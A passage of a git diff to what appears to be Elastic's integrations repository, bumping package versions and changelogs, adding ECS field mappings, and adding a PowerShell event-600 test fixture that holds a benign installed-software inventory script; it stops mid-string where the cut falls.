100644 --- a/packages/websphere_application_server/manifest.yml +++ b/packages/websphere_application_server/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: websphere_application_server title: WebSphere Application Server -version: "1.1.0" +version: "1.3.0" description: Collects metrics from IBM WebSphere Application Server with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.3.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -65,6 +65,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/windows/changelog.yml b/packages/windows/changelog.yml index 14489a32904..64e900ef49d 100644 --- a/packages/windows/changelog.yml +++ b/packages/windows/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.44.5" + changes: + - description: Fix splitting of parameters for event 600 where it can hold multiline values in parameters. + type: bugfix + link: https://github.com/elastic/integrations/pull/9490 +- version: "1.44.4" + changes: + - description: Map host.os.type explicitly for all data streams. + type: bugfix + link: https://github.com/elastic/integrations/pull/9367 +- version: "1.44.3" + changes: + - description: Add filters for visualizations to ensure only AppLocker events are displayed + type: bugfix + link: https://github.com/elastic/integrations/pull/8993 +- version: "1.44.2" + changes: + - description: Added error.message and http.request.body.bytes ECS field mapping. + type: bugfix + link: https://github.com/elastic/integrations/pull/8976 - version: "1.44.1" changes: - description: Properly parse file hashes for Sysmon event ID 26, file delete detected diff --git a/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml b/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml +++ b/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml b/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml index 8e7d528fe9a..9194a65e230 100644 --- a/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml +++ b/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker EXE and DLL Events via Splunk Enterprise REST API description: Collect AppLocker EXE and DLL Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml b/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml +++ b/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_msi_and_script/manifest.yml b/packages/windows/data_stream/applocker_msi_and_script/manifest.yml index 16ff4b87063..4f1e602b8f8 100644 --- a/packages/windows/data_stream/applocker_msi_and_script/manifest.yml +++ b/packages/windows/data_stream/applocker_msi_and_script/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker MSI and Script Events via Splunk Enterprise REST API description: Collect AppLocker MSI and Script Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml b/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml +++ b/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml b/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml index fdb402f7bf0..a08d1582b6a 100644 --- a/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml +++ b/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker/Packaged app-Deployment Events via Splunk Enterprise REST API description: Collect AppLocker Packaged app-Deployment Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml b/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml +++ b/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml b/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml index 5b463668014..a7a0b5eacf9 100644 --- a/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml +++ b/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker/Packaged app-Execution Events via Splunk Enterprise REST API description: Collect AppLocker Packaged app-Execution Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json index 3c8d6db144a..e139af56815 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json @@ -44,4 +44,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json index 20217effad9..c4c112fb488 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json @@ -62,4 +62,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json index 9747c600d3a..142696f5055 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json @@ -101,4 +101,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/fields/agent.yml b/packages/windows/data_stream/forwarded/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/forwarded/fields/agent.yml +++ b/packages/windows/data_stream/forwarded/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/forwarded/fields/ecs.yml b/packages/windows/data_stream/forwarded/fields/ecs.yml index 0647023c979..bd0c561fc17 100644 --- a/packages/windows/data_stream/forwarded/fields/ecs.yml +++ b/packages/windows/data_stream/forwarded/fields/ecs.yml @@ -50,6 +50,8 @@ name: ecs.version - external: ecs name: error.code +- external: ecs + name: error.message - external: ecs name: event.action - external: ecs @@ -118,6 +120,8 @@ name: group.name - external: ecs name: host.name +- external: ecs + name: http.request.body.bytes - external: ecs name: log.file.path - external: ecs diff --git a/packages/windows/data_stream/forwarded/manifest.yml b/packages/windows/data_stream/forwarded/manifest.yml index e9bc4e762a2..56bbee8b6e0 100644 --- a/packages/windows/data_stream/forwarded/manifest.yml +++ b/packages/windows/data_stream/forwarded/manifest.yml @@ -61,6 +61,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -71,7 +72,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows ForwardedEvents via Splunk Enterprise REST API description: Collect ForwardedEvents via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/perfmon/fields/agent.yml b/packages/windows/data_stream/perfmon/fields/agent.yml index 294674f3128..918048a45b8 100644 --- a/packages/windows/data_stream/perfmon/fields/agent.yml +++ b/packages/windows/data_stream/perfmon/fields/agent.yml @@ -56,6 +56,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json index 251fff9bc44..1c201c475bb 100644 --- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json +++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json @@ -206,6 +206,34 @@ "record_id": 1847, "task": "Pipeline Execution Details" } + }, + { + "winlog": { + "computer_name": "foo", + "record_id": 67086, + "event_id": "600", + "task": "Provider Lifecycle", + "keywords": [ + "Classic" + ], + "channel": "Windows PowerShell", + "event_data": { + "param3": "\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t$Guid= $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} \n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "param1": "Function", + "param2": "Started" + }, + "api": "wineventlog", + "provider_name": "PowerShell", + "opcode": "Info" + }, + "message": "Provider \"Function\" is Started. \n\nDetails: \n\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t\t\t\t\t\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\t\t\t\t\t\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t\t\t\t\t\t\t$Guid = $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} \n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "@timestamp": "2024-03-28T19:01:28.331Z", + "event": { + "code": "600", + "provider": "PowerShell", + "action": "Provider Lifecycle", + "dataset": "windows.powershell" + } } ] } \ No newline at end of file diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json index b1edb463cc6..e8020052aed 100644 --- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json @@ -441,6 +441,171 @@ "record_id": "1847", "task": "Pipeline Execution Details" } + }, + { + "@timestamp": "2024-03-28T19:01:28.331Z", + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Provider Lifecycle", + "category": "process", + "code": "600", + "dataset": "windows.powershell", + "kind": "event", + "provider": "PowerShell", + "sequence": 9, + "type": "info" + }, + "message": "Provider \"Function\" is Started. \n\nDetails: \n\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t\t\t\t\t\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\t\t\t\t\t\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t\t\t\t\t\t\t$Guid = $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} \n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "powershell": { + "process": { + "executable_version": "5.1.20348.2227" + }, + "provider": { + "name": "Function", + "new_state": "Started" + } + }, + "process": { + "args": [ + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "function", + "Convert-GuidToCompressedGuid", + "{\n", + "[CmdletBinding()]\n", + "[OutputType('System.String')]\n", + "param", + "(\n", + "[Parameter(ValueFromPipeline=,", + "ValueFromPipelineByPropertyName=,", + "Mandatory=$true)]\n", + "[string]$Guid\n", + ")\n", + "begin", + "{\n", + "$Guid=", + "$Guid.Replace('-',", + "'').Replace('{',", + "'').Replace('}',", + "'')\n", + "}\n", + "process", + "{\n", + "try", + "{\n", + "$Groups", + "=", + "@(\n", + "$Guid.Substring(0,", + "8).ToCharArray(),\n", + "$Guid.Substring(8,", + "4).ToCharArray(),\n", + "$Guid.Substring(12,", + "4).ToCharArray(),\n", + "$Guid.Substring(16,", + "16).ToCharArray()\n", + ")\n", + "$Groups[0..2]", + "|", + "foreach", + "{\n", + "[array]::Reverse($_)\n", + "}\n", + "$CompressedGuid", + "=", + "($Groups[0..2]", + "|", + "foreach", + "{", + "$_", + "-join", + "''", + "})", + "-join", + "''\n\n", + "$chararr", + "=", + "$Groups[3]\n", + "for", + "($i", + "=", + "0;", + "$i", + "-lt", + "$chararr.count;", + "$i++)", + "{\n", + "if", + "(($i", + "%", + "2)", + "-eq", + "0)", + "{\n", + "$CompressedGuid", + "+=", + "($chararr[$i+1]", + "+", + "$chararr[$i])", + "-join", + "''\n", + "}\n", + "}\n", + "$CompressedGuid\n", + "}", + "catch", + "{\n", + "Write-Error", + "$_.Exception.Message\n", + "}\n", + "}\n", + "}\n", + "function", + "Clean-Quotes-Backslash", + "{\n", + "param", + "([string]$str)\n", + "if($str.length", + "-ge", + "2", + "-and", + "$str.Substring(0,1)", + "-eq", + "'' -and $str.Substring($str.length - 1) -eq ''){\n", + "$str", + "=", + "$str.Substring(1,", + "$str.length", + "-", + "2)\n", + "}\n", + "$str", + "=", + "$str.Replace('\\',", + "'\\\\')\n", + "$str", + "=", + "$str.Replace('', '\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=PSChildName;e={$_.PSChildName}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=Name;e={$_.DisplayName}},\n\t@{n=PackageId;e={$_.PSChildName}}, @{n=Version;e={$_.DisplayVersion}}, Publisher,\n\t@{n=InstalledTime;e={[datetime]::ParseExact($_.InstallDate,yyyyMMdd,$null).ToUniversalTime().ToString(yyyy-MM-ddTHH:mm:ssZ)}} | % { [Console]::WriteLine(@\n{Name:$(Clean-Quotes-Backslash $_.Name),PackageId:$($_.PackageId),Version:$(Clean-Quotes-Backslash $_.Version),Publisher:$(Clean-Quotes-Backslash $_.Publisher),InstalledTime:$($_.InstalledTime)},\n@)}" + ], + "args_count": 118, + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t$Guid= $Guid.Replace('-', '').Replace('{', '').Replace('}', 